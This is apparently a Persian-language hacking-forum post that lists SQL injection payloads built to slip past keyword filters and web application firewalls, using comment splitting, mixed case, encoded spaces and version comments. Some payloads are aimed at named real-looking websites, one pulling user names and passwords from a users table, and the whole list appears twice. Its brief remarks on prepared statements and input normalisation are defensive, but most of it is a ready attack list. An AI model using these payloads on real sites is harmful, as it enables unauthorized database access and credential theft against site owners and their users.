سلام خدمت دوستان گل و اساتید عزیز
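این تاپیک اختصاص داره به بایپس‌های مفید و موثر در حملات SQL injection، یعنی شکل‌هایی از union/select که فیلترها و WAFهای مبتنی بر کلمه‌ی کلیدی تشخیصشون نمی‌دن. همه‌ی این نمونه‌ها فقط وقتی جواب می‌دن که مقدار پارامتر (مثل id) مستقیم به متن کوئری چسبونده بشه؛ اگه کوئری با prepared statement و پارامتر بایندشده ساخته بشه، هیچ‌کدوم از این تغییر شکل‌ها اثری نداره.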
با آرزوی موفقیت برای همه
[php]
http://www.site.com/index.php?id=-4 and (select 1)%20= (select 0x414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 ) union all select 1*2*version()*4*5*6*7*8*9*10*11*12*13*14*15*16*17* 18*19*20*21*22*23--
================================================== ===============
http://www.asite.com/index.php?id=-4 and (select 1) = (select 2) 0union all select 1*2*version()*4*5*6*7*8*9*10*11*12*13*14*15*16*17* 18*19*20*21*22*23--
================================================== ===============
http://www.site.com/index.php?id=-4/**/union/**/all/*!50000select*/1*2*3*4*5*6*7*8*9*10*11*12*13*14*15/**/
================================================== ================
http://www.site.com/index.php?id=-4/**/union/**/Select/**/0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0/**/
================================================== ================
http://www.site.com/index.php?id=-4/**/union/**/select*/1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*20 *21*22*23/**/
================================================== =================
http://www.site.com/index.php?id=-4/**/union/**/select*/(0x312c322c332c342c352c362c372c382c392c31302c31312 c31322c31332c31342c31352c31362c31372c31382c31392c3 2302c32312c32322c3233)/**/
================================================== =================
http://www.asite.com/index.php?id=-4+union+(select+ 1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*20 *21*22*23)--
================================================== =================
UN / ** / ION / ** / SE / ** /
LECT / ** / user* password from users
================================================== =================
http://Target.com/news.php?id=-999+/*!union+select+1*group_concat(table_name)*3*4*5*6* 7+from+information_schema.tables+where+table_schem a=database()*/--
================================================== =================
http://www.1station.com.my/sport.php?id=19+/**/+OrDeR+/**/+bY+/**/+1--
================================================== ==================
http://almasa-group.com/products.php?pro_id=-43+/**/+Union/*!select*/1*2*3*4*5--
================================================== ===================
http://almasa-group.com/products.php?pro_id=-43+/*!uniOn+seLect+1*2*3*4*group_concat(user_name*0x3a *user_password)+FROM almasag_copp1.cpg_users*/+--+
================================================== ===================
http://www.site.com/index.php?id=4/**/+UnIon/**/+SeLecT/**/+1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*2 0*21*22*23--
================================================== ===================
http://www.designsbyjasmine.com/category_list.php?category_id=-999+/*!union*/+select+1*table_name*3*4*5*6*7+from+information_sc hema./*!tables*/--
[/php]
اینم چندتا دیگه
[php]
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+'UnI''On'+'SeL''ECT'
id=1+%55nion all /*!12345%53elect*/ 1*version()*3—
id=1+UnIoN+SeLecT 1*2*3—
id=1+UnIOn/**/SeLect 1*2*3—
id=1+UNIunionON+SELselectECT 1*2*3—
id=1+/*!UnIOn*/+/*!sElEcT*/ 1*2*3—
id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1*2*3—
id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1*2 *3—
id=1+un/**/ion+sel/**/ect+1*2*3--
id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1*2*3
id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
id=1+/**/union/*&id=*/select/*&id=*/1*2*3--
[/php]
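یه مورد خیلی تخصصی: توی این نمونه‌ها بین کلمات کلیدی فاصله‌ی معمولی نیست و جاش پرانتز، بک‌تیک، کامنت یا %a0 و %09 اومده؛ پس قانون تشخیصی که روی «union + فاصله + select» حساب کنه این‌ها رو نمی‌بینه و ورودی باید قبل از تطبیق، دیکد و نرمال بشه.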
[php]
(0)union(select(table_name)*column_name*…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
[/php]
این تاپیک اختصاص داره به بایپس‌های مفید و موثر در حملات SQL injection (دور زدن فیلترهای مبتنی بر کلمه‌ی کلیدی)
با آرزوی موفقیت برای همه
[php]
http://www.site.com/index.php?id=-4 and (select 1)%20= (select 0x414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 ) union all select 1*2*version()*4*5*6*7*8*9*10*11*12*13*14*15*16*17* 18*19*20*21*22*23--
================================================== ===============
http://www.asite.com/index.php?id=-4 and (select 1) = (select 2) 0union all select 1*2*version()*4*5*6*7*8*9*10*11*12*13*14*15*16*17* 18*19*20*21*22*23--
================================================== ===============
http://www.site.com/index.php?id=-4/**/union/**/all/*!50000select*/1*2*3*4*5*6*7*8*9*10*11*12*13*14*15/**/
================================================== ================
http://www.site.com/index.php?id=-4/**/union/**/Select/**/0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0/**/
================================================== ================
http://www.site.com/index.php?id=-4/**/union/**/select*/1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*20 *21*22*23/**/
================================================== =================
http://www.site.com/index.php?id=-4/**/union/**/select*/(0x312c322c332c342c352c362c372c382c392c31302c31312 c31322c31332c31342c31352c31362c31372c31382c31392c3 2302c32312c32322c3233)/**/
================================================== =================
http://www.asite.com/index.php?id=-4+union+(select+ 1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*20 *21*22*23)--
================================================== =================
UN / ** / ION / ** / SE / ** /
LECT / ** / user* password from users
================================================== =================
http://Target.com/news.php?id=-999+/*!union+select+1*group_concat(table_name)*3*4*5*6* 7+from+information_schema.tables+where+table_schem a=database()*/--
================================================== =================
http://www.1station.com.my/sport.php?id=19+/**/+OrDeR+/**/+bY+/**/+1--
================================================== ==================
http://almasa-group.com/products.php?pro_id=-43+/**/+Union/*!select*/1*2*3*4*5--
================================================== ===================
http://almasa-group.com/products.php?pro_id=-43+/*!uniOn+seLect+1*2*3*4*group_concat(user_name*0x3a *user_password)+FROM almasag_copp1.cpg_users*/+--+
================================================== ===================
http://www.site.com/index.php?id=4/**/+UnIon/**/+SeLecT/**/+1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*2 0*21*22*23--
================================================== ===================
http://www.designsbyjasmine.com/category_list.php?category_id=-999+/*!union*/+select+1*table_name*3*4*5*6*7+from+information_sc hema./*!tables*/--
[/php]
اینم چندتا دیگه
[php]
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+'UnI''On'+'SeL''ECT'
id=1+%55nion all /*!12345%53elect*/ 1*version()*3—
id=1+UnIoN+SeLecT 1*2*3—
id=1+UnIOn/**/SeLect 1*2*3—
id=1+UNIunionON+SELselectECT 1*2*3—
id=1+/*!UnIOn*/+/*!sElEcT*/ 1*2*3—
id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1*2*3—
id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1*2 *3—
id=1+un/**/ion+sel/**/ect+1*2*3--
id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1*2*3
id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
id=1+/**/union/*&id=*/select/*&id=*/1*2*3--
[/php]
یه مورد خیلی تخصصی...
[php]
(0)union(select(table_name)*column_name*…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
[/php]